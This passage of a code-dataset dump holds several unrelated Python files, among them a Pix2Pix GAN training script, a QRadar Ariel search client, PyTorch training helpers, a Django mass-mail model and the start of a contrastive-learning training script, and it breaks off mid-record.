= Conv2D(filters, kernel_size=f_size, strides=1, padding='same', activation='relu')(u)\n if dropout_rate:\n u = Dropout(dropout_rate)(u)\n u = BatchNormalization(momentum=0.8)(u)\n u = Concatenate()([u, skip_input])\n return u\n\n # Image input\n d0 = Input(shape=self.img_shape)\n\n # Downsampling\n d1 = conv2d(d0, self.gf, bn=False)\n d2 = conv2d(d1, self.gf*2)\n d3 = conv2d(d2, self.gf*4)\n d4 = conv2d(d3, self.gf*8)\n d5 = conv2d(d4, self.gf*8)\n d6 = conv2d(d5, self.gf*8)\n d7 = conv2d(d6, self.gf*8)\n\n # Upsampling\n u1 = deconv2d(d7, d6, self.gf*8)\n u2 = deconv2d(u1, d5, self.gf*8)\n u3 = deconv2d(u2, d4, self.gf*8)\n u4 = deconv2d(u3, d3, self.gf*4)\n u5 = deconv2d(u4, d2, self.gf*2)\n u6 = deconv2d(u5, d1, self.gf)\n\n u7 = UpSampling2D(size=2)(u6)\n output_img = Conv2D(self.channels, kernel_size=4, strides=1, padding='same', activation='sigmoid')(u7)\n\n return Model(d0, output_img)\n\n def build_discriminator(self):\n\n def d_layer(layer_input, filters, f_size=4, bn=True):\n \"\"\"Discriminator layer\"\"\"\n d = Conv2D(filters, kernel_size=f_size, strides=2, padding='same')(layer_input)\n d = LeakyReLU(alpha=0.2)(d)\n if bn:\n d = BatchNormalization(momentum=0.8)(d)\n return d\n\n img_A = Input(shape=self.img_shape)\n img_B = Input(shape=self.img_shape)\n\n # Concatenate image and conditioning image by channels to produce input\n combined_imgs = Concatenate(axis=-1)([img_A, img_B])\n\n d1 = d_layer(combined_imgs, self.df, bn=False)\n d2 = d_layer(d1, self.df*2)\n d3 = d_layer(d2, self.df*4)\n d4 = d_layer(d3, self.df*8)\n\n validity = Conv2D(1, kernel_size=4, strides=1, padding='same')(d4)\n\n return Model([img_A, img_B], validity)\n\nif __name__ == '__main__':\n gan = Pix2Pix()\n print(\"generator: \")\n# gan.generator.summary()\n print(\"discriminator: \")\n# gan.discriminator.summary()\n# gan.combined.summary()\n\n\ndef generator_training_Img(real_list_dir,white_list_dir,resize=None,batch_size=32):\n batch_real_img=[]\n batch_white_img=[]\n for _ in range(batch_size):\n random_img_index = np.random.randint(0, 254, size=1)[0]\n real_img = imread(real_list_dir[random_img_index] , mode='L')\n white_img = imread(white_list_dir[random_img_index] , mode='L')\n\n if resize:\n real_img = imresize(real_img,resize)\n white_img = imresize(white_img,resize)\n batch_real_img.append(real_img)\n batch_white_img.append(white_img)\n batch_real_img = np.array(batch_real_img)/127.5-1\n batch_real_img = np.expand_dims(batch_real_img,axis=1)\n batch_white_img = np.array(batch_white_img)/127.5-1\n batch_white_img = np.expand_dims(batch_white_img,axis=3)\n return batch_real_img,batch_white_img\n\ndef generator_test_Img(white_list_dir,resize=None ):\n batch_real_img=[]\n batch_white_img=[]\n for i in range(10):\n white_img = imread(white_list_dir[i] , mode='L')\n\n if resize:\n white_img = imresize(white_img,resize)\n batch_white_img.append(white_img)\n batch_white_img = np.array(batch_white_img)/127.5-1\n batch_white_img = np.expand_dims(batch_white_img,axis=3)\n return batch_white_img\n\n\ntrain_real_data_dir = r'./datasets/train/Real/*'\ntrain_white_data_dir = r'./datasets/train/White/*'\n\nreal_list = glob(train_real_data_dir)\ntrain_real_data_list = []\ntrain_real_data_list.extend(real_list)\n\nwhite_list = glob(train_white_data_dir)\ntrain_white_data_list = []\ntrain_white_data_list.extend(white_list)\n\n\nepochs = 7000\nbatch_size_val = 32\nall_d_loss = np.zeros(epochs)\nall_g_loss = np.zeros(epochs)\n \n# Adversarial loss ground truths\nvalid = np.ones((batch_size_val, 8, 8,1))\nfake = np.zeros((batch_size_val, 8, 8, 1))\n\nfor epoch in range(0, epochs):\n start_time = datetime.datetime.now()\n \n ori_img,white_img = generator_training_Img(real_list_dir=train_real_data_list,\n white_list_dir=train_white_data_list,\n resize=(128,128),\n batch_size= batch_size_val)\n imgs_A = ori_img \n imgs_B = white_img \n imgs_B = imgs_B.reshape((32,128,128,1))\n imgs_A = imgs_A.reshape((32,128,128,1))\n \n\n fake_A = gan.generator.predict(imgs_B)\n d_loss_real = gan.discriminator.train_on_batch([imgs_A, imgs_B], valid)\n d_loss_fake = gan.discriminator.train_on_batch([fake_A, imgs_B], fake)\n d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)\n \n for i in range(4):\n g_loss = gan.combined.train_on_batch([imgs_A, imgs_B], [valid, imgs_A])\n \n all_d_loss[epoch] = d_loss[0]\n all_g_loss[epoch] = g_loss[0]\n \n elapsed_time = str(datetime.datetime.now() - start_time)\n print_out = (epoch, epochs, d_loss[0], 100*d_loss[1], g_loss[0],elapsed_time.split(\".\")[0])\n print (\"[Epoch %d/%d] [D loss: %f, acc: %3d%%] [G loss: %f] time: %s\" % print_out)\n np.savetxt(\"all_d_loss.txt\", all_d_loss, delimiter=\",\")\n np.savetxt(\"all_g_loss.txt\", all_g_loss, delimiter=\",\")\n\n\ntest_white_data_dir = r'./datasets/test/*'\ntest_white_list = glob(test_white_data_dir)\ntest_white_data_list = []\ntest_white_data_list.extend(test_white_list)\ntest_white_data_list = sorted(test_white_data_list)\n\nprint(len(test_white_data_list), test_white_data_list)\ntest_white_data_list = generator_test_Img( white_list_dir=test_white_data_list, resize=(128,128))\n\nfake_A = gan.generator.predict(test_white_data_list)\ngen_imgs = np.concatenate([fake_A])\ngen_imgs = 0.5 * gen_imgs\nprint(gen_imgs.shape)\n\n\nids = 0\nfor img in gen_imgs:\n img = img.reshape((128, 128))\n plt.imsave(\"res_images/main_test_res_\" + str(ids) + \".jpg\", img, cmap=\"gray\")\n ids += 1 \nplt.close() \nprint(\"test_data generator predict over.\")\n\n\ndef numpy_to_csv(input_image,image_number=10,save_csv_name='predict.csv'):\n save_image=np.zeros([int(input_image.size/image_number),image_number],dtype=np.float32)\n\n for image_index in range(image_number):\n save_image[:,image_index]=input_image[image_index,:,:].flatten()\n\n base_word='id'\n df = pd.DataFrame(save_image)\n index_col=[]\n for i in range(n):\n col_word=base_word+str(i)\n index_col.append(col_word)\n df.index.name='index'\n df.columns=index_col\n df.to_csv(save_csv_name)\n print(\"Okay! numpy_to_csv\")\n\nn=10\nnumpy_to_csv(input_image= gen_imgs,image_number=n,save_csv_name='Predict.csv')\n\n\n# draw loss \nall_d_loss_txt = np.loadtxt(\"all_d_loss.txt\")\nall_g_loss_txt = np.loadtxt(\"all_g_loss.txt\")\n\n# print( all_d_loss_txt.shape, all_d_loss_txt.shape[0])\n# print(all_g_loss_txt, all_g_loss_txt.shape, all_g_loss_txt.shape[0])\n\nfig = plt.figure()\nax = plt.axes()\nall_d_loss_x = np.linspace(0, 1, all_d_loss_txt.shape[0])\nall_g_loss_x = np.linspace(0, 1, all_g_loss_txt.shape[0])\n\nplt.plot(all_g_loss_x, all_g_loss_txt, '-r'); # dotted red, g_loss\nplt.plot(all_d_loss_x , all_d_loss_txt , '-g'); # dotted green, d_loss\n\nplt.show()\n\n","sub_path":"homework5/commit/A10515001.py","file_name":"A10515001.py","file_ext":"py","file_size_in_byte":10098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"246545216","text":"#!/usr/bin/python\n# Licensed Materials - Property of IBM\n# 5725I76-CC011829\n# (C) Copyright IBM Corp. 2012, 2020. All Rights Reserved.\n# US Government Users Restricted Rights - Use, duplication or\n# disclosure restricted by GSA ADP Schedule Contract with IBM Corp.\n\nimport time\nimport logging\nfrom flask import request\nfrom . import qpylib\n\nclass ArielSearchError(Exception):\n \"\"\"Exception raised for errors in Ariel search.\n\n Attributes:\n expression -- input expression in which the error occurred\n message -- explanation of the error\n \"\"\"\n def __init__(self, expression, message):\n super(ArielSearchError, self).__init__(message)\n self.expression = expression\n self.message = message\n def __str__(self):\n return self.message\nclass ArielSearches():\n \"\"\" Provides methods for executing Ariel searches from the QRadar ariel API.\"\"\"\n\n def __init__(self, auth_token=None):\n \"\"\"Constructor.\"\"\"\n self.logger = logging.getLogger('com.ibm.applicationLogger')\n self.auth_token = auth_token\n\n @staticmethod\n def __acquire_sec_token():\n \"\"\"\n Acquire security token\n \"\"\"\n if request:\n return request.cookies.get('SEC')\n return None\n\n @staticmethod\n def __acquire_qradarcsrf_token():\n \"\"\"\n Acquire QRadar CSRF token\n \"\"\"\n if request:\n return request.cookies.get('QRadarCSRF')\n return None\n\n def get_tokens(self, headers):\n \"\"\"\n Retrieve tokens\n \"\"\"\n if headers is None:\n headers = {}\n if 'SEC' not in headers:\n if self.auth_token:\n headers['SEC'] = self.auth_token\n elif request:\n headers['SEC'] = self.__acquire_sec_token()\n else:\n raise ArielSearchError(None, \"Unable to aquire any SEC token\")\n if request and 'QRadarCSRF' not in headers:\n headers['QRadarCSRF'] = self.__acquire_qradarcsrf_token()\n return headers\n\n def search(self, query):\n \"\"\" Creates an Ariel search as specified by the AQL query expression.\n Searches are performed asynchronously.\n @param query: The AQL query to execute.\n @return: Tuple containing the search status and search_id.\n \"\"\"\n headers = self.get_tokens({'Accept':'application/json', 'Content-Type':'application/json',\n 'Version':'5.1'})\n params = {'query_expression':query, 'fields':'status,search_id'}\n full_url = 'api/ariel/searches'\n if self.logger.isEnabledFor(logging.DEBUG):\n self.logger.debug(\"REQUEST: {%s}, headers={%s}, params={%s}\",\n full_url, headers, params)\n response = qpylib.REST('post', full_url, headers=headers, params=params)\n if self.logger.isEnabledFor(logging.DEBUG):\n self.logger.debug(\"RESPONSE (status_code={%d}): {%s}\",\n response.status_code, response.text)\n if response.status_code != 201:\n self.logger.error(\" Failed to start Ariel search with query expression {%s}: {%s} {%d}\",\n query, response.text, response.status_code)\n try:\n response_json = response.json()\n message = response_json[\"message\"] if \"message\" in response_json else response.text\n except ValueError:\n message = response.text\n raise ArielSearchError(query, message)\n return (response.json().get('status'), response.json().get('search_id'))\n\n def search_s(self, query, timeout=60):\n \"\"\" Creates an Ariel search as specified by the AQL query expression.\n Searches are performed synchronously.\n @param query: The AQL query to execute.\n @param timeout: The timeout to wait for the search to complete\n @return: The record count of the search results.\n \"\"\"\n response = self.search(query)\n wait_timeout = time.time() + timeout\n search_id = response[1]\n while True:\n status, record_count = self.status(search_id)\n if status in ('CANCELED', 'ERROR'):\n raise ArielSearchError(query,\n \"Ariel search_id {0} failed; {1}\"\n .format(search_id, status))\n if status == 'COMPLETED':\n return (search_id, record_count)\n\n if time.time() < wait_timeout:\n time.sleep(10)\n continue\n raise ArielSearchError(query,\n \"Ariel search_id {0} did not complete within {1}s!\"\n .format(search_id, timeout))\n\n def status(self, search_id):\n \"\"\"Retrieve status information for a search, based on the search_id parameter.\n @param search_id: The identifier for an Ariel search.\n @return: Tuple containing the search status and record count.\n \"\"\"\n headers = self.get_tokens({'Accept':'application/json', 'Content-Type':'application/json',\n 'Version':'5.1'})\n params = {'fields': 'status,record_count'}\n full_url = 'api/ariel/searches/' + search_id\n if self.logger.isEnabledFor(logging.DEBUG):\n self.logger.debug(\"REQUEST: {%s}, headers={%s},params={%s}\",\n full_url, headers, params)\n response = qpylib.REST('get', full_url, headers=headers, params=params)\n response_json = response.json()\n if self.logger.isEnabledFor(logging.DEBUG):\n self.logger.debug(\"RESPONSE: {%s}\", response_json)\n if response.status_code != 200:\n raise ArielSearchError(None, \"Ariel search_id {0} failed;{1}\"\n .format(search_id, response.content))\n return (response_json['status'], response_json['record_count'])\n\n def results(self, search_id, start=0, end=0):\n \"\"\" Retrieve the results of the Ariel search that is identified by the search_id.\n @param search_id: The identifier for an Ariel search.\n @param start: the start offset of the range of records to return\n @param end: the end offset of the range of records to return\n \"\"\"\n headers = self.get_tokens({'Accept':'application/json', 'Content-Type':'application/json',\n 'Version':'5.1'})\n if (start < 0) or (end < start):\n raise ValueError(\"Invalid range; the results are indexed starting at zero\")\n if end > 0:\n headers['Range'] = 'items={0}-{1}'.format(start, end)\n full_url = 'api/ariel/searches/{0}/results'.format(search_id)\n if self.logger.isEnabledFor(logging.DEBUG):\n self.logger.debug(\"REQUEST: {%s}, headers={%s}, params=\",\n full_url, headers)\n response = qpylib.REST('get', full_url, headers=headers)\n if response.status_code != 200:\n raise ArielSearchError(None, \"Ariel search {0} failed; {1}\"\n .format(search_id, response.content))\n return response.json()\n","sub_path":"qpylib/ariel.py","file_name":"ariel.py","file_ext":"py","file_size_in_byte":7236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"57283024","text":"\n\n#calss header\nclass _PARISIAN():\n\tdef __init__(self,): \n\t\tself.name = \"PARISIAN\"\n\t\tself.definitions = [u'from, belonging to, or relating to the city of Paris in France: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_parisian.py","file_name":"_parisian.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"635858506","text":"import torch\nimport os\nimport torch.nn as nn\n\ndef test(model, test_loader):\n\ttotal, correct = 0, 0\n\tmodel.eval()\n\twith torch.no_grad():\n\t\tfor batch_idx, (inputs, targets) in enumerate(test_loader):\n\t\t\t# print(batch_idx)\n\t\t\tinputs, targets = inputs.cuda(), targets.cuda()\n\t\t\toutputs = model(inputs)\n\t\t\t_, predicted = outputs.max(1)\n\t\t\ttotal += targets.size(0)\n\t\t\tcorrect += predicted.eq(targets).sum().item()\n\t\t\tacc = correct/total\n\t\t\t# if batch_idx % 10 == 0:\n\t\t\t# print('Acc: %.2f%% (%d/%d)'% (100. * acc, correct, total))\n\tprint('Final acc: %.2f%% (%d/%d)'% (100. * acc, correct, total))\n\tmodel.train()\n\treturn acc\n\n\ndef train(model, train_loader, test_loader, epoch, work_dir=None, lr=None):\n\tif work_dir is not None:\n\t\tif not os.path.exists(work_dir):\n\t\t\tos.makedirs(work_dir)\n\telse:\n\t\twork_dir = ''\n\tprint('Training...')\n\tacc = test(model, test_loader)\n\tprint('Accuray for model before fine-tuning = {}'.format(acc))\n\t\n\tcrit = nn.CrossEntropyLoss().cuda()\n\toptimizer = torch.optim.SGD(model.parameters(), lr=lr, momentum=0.9)\n\tbest_acc = 0\n\tfor i in range(epoch):\n\t\ttotal_loss = 0\n\t\tfor batch_idx, (inputs, targets) in enumerate(train_loader):\n\t\t\toptimizer.zero_grad()\n\t\t\tinputs, targets = inputs.cuda(), targets.cuda()\n\t\t\toutputs = model(inputs)\n\t\t\tloss = crit(outputs, targets)\n\t\t\ttotal_loss += loss.item()\n\t\t\tloss.backward()\n\t\t\toptimizer.step()\n\t\t\tif batch_idx % 50 == 9:\n\t\t\t\tprint('Epoch = {}, iteration = {}, loss = {}'.format(i + 1, batch_idx + 1, total_loss))\n\t\t\t\ttotal_loss = 0\n\t\tacc = test(model, test_loader)\n\t\tif acc > best_acc:\n\t\t\ttorch.save(model.state_dict(), work_dir + '/best_model.pth')\n\t\t\tbest_acc = acc\n\t\tprint('Accuray after fine-tuning epoch {} = {}, best accuray = {}'.format(epoch, acc, best_acc))\n\t\ttorch.save(model.state_dict(), work_dir + '/epoch{}.pth'.format(i))\n","sub_path":"portable_quantizer_codes/train_utils.py","file_name":"train_utils.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"30239065","text":"# -*-coding:utf-8-*-\n\"\"\"Article class file for the media understanding 2017 project.\n\nFile name: article.py\nAuthor: Media Understanding 2017\nDate created: 7/2/2017\nDate last modified: 7/2/2017\nPython Version: 3.4\n\"\"\"\nfrom collections import Counter\n\nclass Article(object):\n \"\"\"\n Standarized format for a news entry from any source.\n\n All news entries should be in this format, unspecified arguments are\n initialized as empty strings, except for keywords, which is a list.\n Btw this initialized like this: article.Article(args)\n \"\"\"\n\n def __init__(self, title=\"\", author=\"\", source=\"\", url=\"\", category=\"\",\n keywords=[], published=\"\", summary=\"\", text=\"\", ID=\"\", term_count=Counter()):\n \"\"\"Initialize all values.\"\"\"\n self.title = title\n self.author = author\n self.source = source\n self.url = url\n self.keywords = keywords\n self.category = category\n self.published = published\n self.summary = summary\n self.text = text\n self.ID = ID\n self.term_count = term_count\n\n def __repr__(self):\n \"\"\"Print article name when object is printed.\"\"\"\n return \"
\"\n","sub_path":"media_conversation/article.py","file_name":"article.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"288012325","text":"# given array of elements find duplicate elements\n#BRUTE\nnums = [1,2,9,3,66,9]\n\ndef find_duplicates(nums):\n for i in range(len(nums)-1):\n for j in range(i+1, len(nums)):\n if nums[i] == nums[j]:\n return True\n return False\n#print(find_duplicates(nums))\n\n#sol2 : Sort array find adjacent ele are same\n#optimun - o(nlogn)\ndef find_duplicates_sort(nums):\n nums = sorted(nums)\n for i in range(len(nums)-1):\n if nums[i] == nums[i+1]:\n return True\n return False\n#print(find_duplicates_opt(nums))\n\n#sol3 - Hashset - o(n)\ndef find_duplicates_hash(nums):\n hset=set()\n for i in nums:\n if i not in hset:\n hset.add(i)\n else:\n return True\n return False\nprint(find_duplicates_hash(nums))\n \n\n","sub_path":"Contains-Duplicate.py","file_name":"Contains-Duplicate.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"144906746","text":"import time\r\nimport PIL\r\nfrom PIL import Image\r\nimport Adafruit_SSD1306\r\nimport numpy as np\r\n\r\ndisp = Adafruit_SSD1306.SSD1306_128_32(rst=None, i2c_bus=1, gpio=1)\r\n\r\ndisp.begin()\r\n\r\ndisp.clear()\r\ndisp.display()\r\n\r\nimIN = Image.open(\"GIFlove.gif\")\r\n\r\n\r\nf = 0.4\r\nfy = int(imIN.size[0] * f)\r\nfx = int(imIN.size[1] * f)\r\n\r\ny = 36\r\nx = 21\r\n\r\nwhile True:\r\n for i in range(imIN.n_frames):\r\n imIN.seek(i)\r\n ip = np.asarray(imIN.resize((fy,fx)))[y:y+32,x:x+128]\r\n ipinv = np.zeros(ip.shape)\r\n for iy in range(ip.shape[0]):\r\n for ix in range(ip.shape[1]):\r\n if ip[iy,ix] > 30:\r\n ipinv[iy,ix] = 0\r\n else:\r\n ipinv[iy,ix] = 1\r\n\r\n disp.image(Image.fromarray(ipinv).convert(\"1\"))\r\n disp.display()\r\n time.sleep(1)\r\n","sub_path":"GIFlove.py","file_name":"GIFlove.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"275572572","text":"def amazon(amazon_website):\n from selenium import webdriver\n from selenium.webdriver.firefox.options import Options\n options = Options()\n options.headless = True\n driver = webdriver.Firefox(options=options)\n actual_amazon_website = driver.get(amazon_website)\n amazon_price = driver.find_element_by_xpath('//*[@id=\"price_inside_buybox\"]')\n print(amazon_price.text)\n driver.close()\n","sub_path":"websites/amazon/backup_for_amazon.py","file_name":"backup_for_amazon.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"574151630","text":"#!/usr/bin/env python3\nimport numpy as np\n\ndef step_func(x):\n return np.array(x > 0, dtype=np.int)\n\ndef sigmoid(x):\n return 1 / (1 + np.exp(-x))\n\ndef relu(x):\n return np.maximum(0, x)\n\ndef identity_function(x):\n return x\n\ndef softmax(a):\n c = np.max(a)\n exp_a = np.exp(a - c)\n sum_exp_a = np.sum(exp_a)\n y = exp_a / sum_exp_a\n return y\n\ndef mean_squared_error(y, t):\n return 0.5 * np.sum((y - t) ** 2)\n\ndef cross_entropy_error(y, t):\n delta = 1e-7\n return -1 * np.sum(t * np.log(y + delta))\n\ndef numerical_gradient(f, x):\n h = 1e-4\n grad = np.zeros_like(x)\n\n for i in range(x.size):\n tmp_val = x[i]\n x[i] = tmp_val + h\n fxh1 = f(x)\n\n x[i] = tmp_val - h\n fxh2 = f(x)\n\n grad[i] = (fxh1 - fxh2) / (2 * h)\n x[i] = tmp_val\n return grad\n \n \ndef gradient_descent(f, init_x, lr=0.01, step_num=100):\n x = init_x\n\n for i in range(step_num):\n grad = numerical_gradient(f, x)\n x -= lr * grad\n\n return x\n\ndef init_network():\n network = {}\n network['W1'] = np.array([[0.1, 0.3, 0.5], [0.2, 0.4, 0.6]])\n network['b1'] = np.array([0.1, 0.2, 0.3])\n network['W2'] = np.array([[0.1, 0.4], [0.2, 0.5], [0.3, 0.6]])\n network['b2'] = np.array([0.1, 0.2])\n network['W3'] = np.array([[0.1, 0.3], [0.2, 0.4]])\n network['b3'] = np.array([0.1, 0.2])\n return network\n\ndef forward(network, x):\n W1, W2, W3 = network['W1'], network['W2'], network['W3']\n b1, b2, b3 = network['b1'], network['b2'], network['b3']\n\n a1 = np.dot(x, W1) + b1\n z1 = sigmoid(a1)\n\n a2 = np.dot(z1, W2) + b2\n z2 = sigmoid(a2)\n\n a3 = np.dot(z2, W3) + b3\n y = identity_function(a3)\n\n return y\n \nif __name__ == '__main__':\n network = init_network()\n X = np.array([1.0, 0.5])\n Y = forward(network, X)\n print(Y)\n","sub_path":"DL/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"226913111","text":"from sqlalchemy.ext.hybrid import hybrid_property\n\nfrom DB.BaseModel import BaseModel\nfrom World.Object.Constants.TypeMask import TypeMask\nfrom World.Object.Constants.ObjectType import ObjectType\n\nfrom Config.Run.config import Config\n\n\nclass Object(BaseModel):\n\n id = BaseModel.column(type='integer', primary_key=True)\n entry = BaseModel.column(type='integer')\n scale_x = BaseModel.column(type='float', default=Config.World.Object.Defaults.scale_x)\n\n __table_args__ = {\n 'schema': Config.Database.DBNames.realm_db\n }\n\n @hybrid_property\n def object_type(self):\n return ObjectType.OBJECT.value\n\n @hybrid_property\n def type_mask(self):\n return TypeMask.OBJECT.value\n\n @hybrid_property\n def high_guid(self):\n return None\n\n @hybrid_property\n def guid(self):\n _guid = self.id\n\n if hasattr(self, 'low_guid'):\n _guid = self.low_guid | (self.high_guid << 48)\n\n if bool(self.entry):\n _guid = (self.low_guid |\n (self.entry << 24) |\n (self.high_guid << 48))\n\n return _guid\n\n @hybrid_property\n def packed_guid(self):\n pack_guid = bytearray(8 + 1)\n size = 1\n index = 0\n\n guid = self.guid\n\n while guid:\n if guid & 0xff > 0:\n pack_guid[0] |= (1 << index)\n pack_guid[size] = guid & 0xff\n size += 1\n\n index += 1\n guid >>= 8\n\n return bytes(pack_guid[:size])\n","sub_path":"World/Object/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"654247851","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models\n\n# Create your models here.\nfrom ckeditor.fields import RichTextField\nfrom multi_email_field.fields import MultiEmailField\nfrom datetime import datetime\nfrom .validators import validate_file_extension\nfrom .storages import OverwriteStorage\n\nSTATUS_CHOICES = (\n ('n', u'Новaя'),\n ('p', u'В процессе'),\n ('f', u'Завершена'),\n)\n\n\nclass MassSender(models.Model):\n\n class Meta:\n verbose_name = u'рассылку'\n verbose_name_plural = u'рассылки'\n\n sender_name_desc = models.CharField(\n u'Имя отправителя', max_length=100, null=True)\n sender_name = models.EmailField(u'Отправить от', max_length=50)\n bcc_list = MultiEmailField(u'Кому:', null=True,\n help_text=u'Добавьте список для рассылки по одному адресу в строке')\n mail_subject = models.CharField(u'Тема письма', max_length=200, null=True)\n mailbody = RichTextField(u'Тело письма')\n mail_attachment = models.FileField(\n u'Вложение',\n validators=[validate_file_extension],\n storage=OverwriteStorage())\n pub_date = models.DateTimeField(\n u'Дата добавления рассылки',\n editable=False,\n default=datetime.now())\n status = models.CharField(\n u'Статус рассылки',\n max_length=1,\n choices=STATUS_CHOICES,\n editable=False,\n default='n')\n send_date = models.DateTimeField(\n u'Дата отправки рассылки',\n editable=False,\n blank=True,\n null=True)\n\n\n def __unicode__(self):\n return self.sender_name\n","sub_path":"Sender/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"584552043","text":"from flask import Flask\nfrom flask.ext.cache import Cache\n\n\napp = Flask(__name__)\ncache = Cache(app, config={'CACHE_TYPE': 'simple'})\n\n\n@app.route('/index')\n@cache.cached()\ndef index():\n print(\"index called\")\n return \"Hello World\"\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8080)\n","sub_path":"app/test/test_cache.py","file_name":"test_cache.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"420162341","text":"from __future__ import print_function\nimport math\nfrom torch.multiprocessing import Pool\nimport functools\n\nimport numpy as np\nimport pdb\nimport os\nimport sys\nimport argparse\nimport time\nimport math\n\nimport torchvision.utils as vutils\nfrom torch.utils.data import *\nimport tensorboard_logger as tb_logger\nimport torch\nimport torch.backends.cudnn as cudnn\nfrom torchvision import transforms, datasets\nfrom torchvision.transforms import functional\n\nfrom util import TwoCropTransform, AverageMeter, GansetDataset, GansteerDataset\nfrom util import adjust_learning_rate, warmup_learning_rate\nfrom util import set_optimizer, save_model\nfrom networks.resnet_big import SupConResNet\nfrom losses import SupConLoss\nimport oyaml as yaml\nimport pbar as pbar\n\nimport io\nimport IPython.display\nimport PIL.Image\nfrom pprint import pformat\nimport tensorflow.compat.v1 as tf\ntf.disable_v2_behavior()\nimport tensorflow_hub as hub\nfrom scipy.stats import truncnorm\nimport utils_bigbigan as ubigbi\nfrom tqdm import tqdm\nimport json\nimport pickle\nfrom tensorflow.python.client import device_lib\n\nfrom pytorch_pretrained_biggan import (\n BigGAN,\n truncated_noise_sample,\n one_hot_from_int\n)\n\n\ntry:\n import apex\n from apex import amp, optimizers\nexcept ImportError:\n pass\n\n\ndef parse_option():\n parser = argparse.ArgumentParser('argument for training')\n parser.add_argument('--encoding_type', type=str, default='contrastive',\n choices=['contrastive', 'crossentropy', 'autoencoding'])\n parser.add_argument('--print_freq', type=int, default=1,\n help='print frequency')\n parser.add_argument('--save_freq', type=int, default=5,\n help='save frequency')\n parser.add_argument('--batch_size', type=int, default=256,\n help='batch_size')\n\n parser.add_argument('--batch_size_gen', type=int, default=86,\n help='batch_size')\n\n parser.add_argument('--num_workers', type=int, default=16,\n help='num of workers to use')\n parser.add_argument('--epochs', type=int, default=200,\n help='number of training epochs')\n parser.add_argument('--showimg', action='store_true', help='display image in tensorboard')\n\n parser.add_argument('--resume', default='', type=str, help='whether to resume training')\n parser.add_argument('--niter', type=int, default=256, help='number of iter for online sampling')\n\n # optimization\n parser.add_argument('--learning_rate', type=float, default=0.03,\n help='learning rate')\n parser.add_argument('--lr_decay_epochs', type=str, default='120,160',\n help='where to decay lr, can be a list')\n parser.add_argument('--lr_decay_rate', type=float, default=0.1,\n help='decay rate for learning rate')\n parser.add_argument('--weight_decay', type=float, default=1e-4,\n help='weight decay')\n parser.add_argument('--momentum', type=float, default=0.9,\n help='momentum')\n\n # model dataset\n parser.add_argument('--model', type=str, default='resnet50')\n parser.add_argument('--dataset', type=str, default='biggan',\n choices=['biggan', 'cifar10', 'cifar100', 'imagenet100', 'imagenet100K', 'imagenet'], help='dataset')\n\n ## Ali: todo: this should be based on opt.encoding type and remove the default (revisit every default) and name of the model for saving\n # method\n parser.add_argument('--numcontrast', type=int, default=20,\n help='num of workers to use')\n parser.add_argument('--method', type=str, default='SimCLR',\n choices=['SupCon', 'SimCLR'], help='choose method')\n parser.add_argument('--walk_method', type=str, choices=['none', 'random', 'steer', 'pca'], help='choose method')\n\n # temperature\n parser.add_argument('--temp', type=float, default=0.1,\n help='temperature for loss function')\n\n # other setting\n parser.add_argument('--cosine', action='store_true', help='using cosine annealing')\n parser.add_argument('--syncBN', action='store_true',\n help='using synchronized batch normalization')\n parser.add_argument('--warm', action='store_true',\n help='warm-up for large batch training')\n parser.add_argument('--trial', type=str, default='0',\n help='id for recording multiple runs')\n\n # specifying folders\n parser.add_argument('-d', '--data_folder', type=str,\n default='/data/scratch-oc40/jahanian/ganclr_results/ImageNet100',\n help='the data folder')\n parser.add_argument('-s', '--cache_folder', type=str,\n default='/data/scratch-oc40/jahanian/ganclr_results/',\n help='the saving folder')\n\n opt = parser.parse_args()\n\n # set the path according to the environment\n opt.data_folder = opt.data_folder\n opt.model_path = os.path.join(opt.cache_folder, '{}_online/{}_models'.format(opt.method, opt.dataset))\n opt.tb_path = os.path.join(opt.cache_folder, '{}_online/{}_tensorboard'.format(opt.method, opt.dataset))\n\n iterations = opt.lr_decay_epochs.split(',')\n opt.lr_decay_epochs = list([])\n for it in iterations:\n opt.lr_decay_epochs.append(int(it))\n\n opt.model_name = '{}_{}onlineMP_{}_{}_ncontrast.{}_lr_{}_decay_{}_bsz_{}_temp_{}_trial_{}'.\\\n format(opt.method, opt.dataset, opt.walk_method, opt.model, opt.numcontrast, opt.learning_rate, \n opt.weight_decay, opt.batch_size, opt.temp, opt.trial)\n\n\n if opt.cosine:\n opt.model_name = '{}_cosine'.format(opt.model_name)\n\n opt.model_name = 